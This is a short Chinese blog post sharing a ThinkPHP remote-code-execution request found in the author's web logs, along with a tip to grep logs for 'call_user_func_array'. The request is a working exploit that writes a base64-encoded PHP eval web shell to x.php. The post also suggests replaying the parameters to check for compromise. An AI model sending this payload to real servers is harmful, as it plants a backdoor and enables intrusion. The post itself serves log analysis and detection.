1 ?s=index/think\\app/invokefunction 2 &function=call_user_func_array 3 &vars[0]=assert 4 &vars[1][]=@eval($_GET[%27fuck%27]); 5 &fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));
这是在我的网站日志中发现的,看上去应该是基于php框架 -think 漏洞操作的,但我压根就没用thinkphp;
大家可以通过查找关键词,比如 搜索日志中包含 call_user_func_array ,的行;
如果你不太确定有没有入侵成功,可以自己拿着参数试一下 .
标签:尝试,vars,以下内容,base64,decode,call,日志,array From: https://www.cnblogs.com/008ts/p/16744506.html